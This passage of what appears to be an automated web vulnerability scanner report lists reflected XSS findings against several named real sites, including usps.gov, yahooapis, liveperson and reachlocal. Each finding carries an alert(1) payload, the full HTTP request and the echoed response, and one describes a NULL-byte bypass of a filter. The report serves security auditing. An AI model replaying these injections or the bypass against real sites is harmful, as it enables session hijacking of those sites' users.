GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D21341037515fa3a"%3balert(1)//ba80aca61be&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:25 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10066
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3Dhttp://altfarm.mediaplex.com/ad/ck/3484-103250-2056-0?mpt=21341037515fa3a";alert(1)//ba80aca61be\" target=\"_blank\">
...[SNIP]...

2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9293a"%3balert(1)//ef5b805385b was submitted in the mpvc parameter. This input was echoed as 9293a";alert(1)//ef5b805385b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/3484/103250/GGGreen_Flash_300x250_LPC.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&mpt=2134103751&mpvc=http://adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIKittBQ4AGDJ1vqGyKOgGbIBDnd3dy5teWZpdHYuY29tugEKMzAweDI1MF9hc8gBCdoBQWh0dHA6Ly93d3cubXlmaXR2LmNvbS9zZWFyY2g_cXVlcnk9WFMlRUYlQkYlQkRkYWNlO2FsZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%2526num%253D1%2526sig%253DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%2526client%253Dca-pub-2043876247497391%2526adurl%253D9293a"%3balert(1)//ef5b805385b HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: svid=319726075672; mojo3=3484:2056/17550:6950/15949:6950/12896:18091/9609:2042

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:56:27 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 00:13:06 GMT
ETag: "3ecbcf-c0b-4870f8e26a880"
Accept-Ranges: bytes
Content-Length: 10042
Content-Type: application/x-javascript

document.write( "<script type=\"text/javascript\" SRC=\"http://img-cdn.mediaplex.com/0/documentwrite.js\"><"+"/script>");

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator
...[SNIP]...
ZXJ0KDEpLy9iYWNruAIYwAIGyALr9M8M4AIA6gIKMjg0ODM1Njc5NZADrAKYA-ADqAMB0QOyxxpSLRKzBPUDAAgAxMgEAeAEAaAGEQ%26num%3D1%26sig%3DAOD64_3qs0lOVYYCU9__uy2v7b56S6k4_Q%26client%3Dca-pub-2043876247497391%26adurl%3D9293a";alert(1)//ef5b805385bhttp://altfarm.mediaplex.com%2Fad%2Fck%2F3484-103250-2056-0%3Fmpt%3D2134103751&clickTag=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DB--PrVhhmTpXRMprmjQSu78WoAvWx35EClYfx3xq515WrPuCi5AEQARgBIK
...[SNIP]...

2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0049fa0'%3balert(1)//a0cbc58a018 was submitted in the loc parameter. This input was echoed as 49fa0';alert(1)//a0cbc58a018 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0'%3balert(1)//a0cbc58a018&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 12:46:59 GMT
Content-Length: 1330

var sID= '937'; var sC= 'IPE937';var rF='False'; var brow= 'Chrome'; var vers= '13'; var lID= '1'; var loc= 'STUDY.49fa0';alert(1)//a0cbc58a018'; var ps='sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY%0049fa0%27%3balert(1)%2f%2fa0cbc58a018&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite'
...[SNIP]...

2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://postcalc.usps.gov
Path:   /CombineScriptsHandler.ashx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c214d'%3balert(1)//ba0b57bcc30 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c214d';alert(1)//ba0b57bcc30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CombineScriptsHandler.ashx?_TSM_HiddenField_=ctl00_ToolkitScriptManager1_HiddenFieldc214d'%3balert(1)//ba0b57bcc30&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d1.0.11119.20010%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3af115bb7c-9ed9-4839-b013-8ca60f25e300%3ae2e86ef9%3a1df13a87%3afde3863c%3aa9a7729d%3a9ea3f0e2%3a9e8e87e9%3a4c9865be%3aba594826%3a507fcf1b%3ac7a4182e HTTP/1.1
Host: postcalc.usps.gov
Proxy-Connection: keep-alive
Referer: http://postcalc.usps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_qptudbmdfb_80=ffffffff3b223e1e45525d5f4f58455e445a4a421548

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: application/x-javascript
Content-Length: 161049
Vary: Accept-Encoding
Cache-Control: public, max-age=3583
Expires: Tue, 06 Sep 2011 13:52:50 GMT
Date: Tue, 06 Sep 2011 12:53:07 GMT
Connection: close

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...
/END AjaxControlToolkit.Calendar.CalendarBehavior.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_ToolkitScriptManager1_HiddenFieldc214d';alert(1)//ba0b57bcc30').value += ';;AjaxControlToolkit, Version=1.0.11119.20010, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:f115bb7c-9ed9-4839-b013-8ca60f25e300:e2e86ef9:1df13a87:fde3863c:a9a7729d:9ea3f0e2:9e8e
...[SNIP]...

2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /v1/public/yql/uhTrending/cokeTrending2

Issue detail

The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 155ee<script>alert(1)</script>7012a81052a was submitted in the limit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1155ee<script>alert(1)</script>7012a81052a HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:34 GMT
Server: YTS/1.19.8
Age: 0
Proxy-Connection: keep-alive
Content-Length: 178

YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1155ee<script>alert(1)</script>7012a81052a'"}});

2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 8a937%0a857122958df was submitted in the site parameter. This input was echoed as 8a937
857122958df
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=218075578a937%0a857122958df&d_id=scottrade HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2141
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQRDBTD=EKEPPJLBDDNCLJEIBDBOFDGL; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 218075578a937
857122958df

lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maem
...[SNIP]...

2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://show.partners-z.com
Path:   /s/show

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae04b<script>alert(1)</script>6304665d48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/show?chan=YAHOO&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&uuid=3c7f76504307f88c4e126d344670b7cc&zip=10010&ae04b<script>alert(1)</script>6304665d48a=1 HTTP/1.1
Host: show.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:18 GMT
Server: Apache/2.2.9 (Debian)
Cache-Control: max-age=0, no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 892
Content-Type: text/html; charset=UTF-8

<html><head></head><body style="width:300px;height:200px;overflow:hidden;border:0px;margin:5px;text-align:center"><div id="haiku" style="height:3em;position:relative;top:50%;margin-top:-2em; color:#D2
...[SNIP]...
ces/showcase-display-server-1.4.12/server/param_mapper.py", line 121, in convert_params
raise InvalidParameterException ("unknown parameter (%s)" % k)
InvalidParameterException: unknown parameter (ae04b<script>alert(1)</script>6304665d48a)
</div>
...[SNIP]...

2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e78be"><script>alert(1)</script>08a96ad64a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...

2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf04"><script>alert(1)</script>7fa24af02aa was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3079
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:56 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
nam
...[SNIP]...

2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdd5"><script>alert(1)</script>2b246827237 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:52 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...

2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62459"><script>alert(1)</script>8a2698860bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3087
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db859"><script>alert(1)</script>c1c2d326329 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
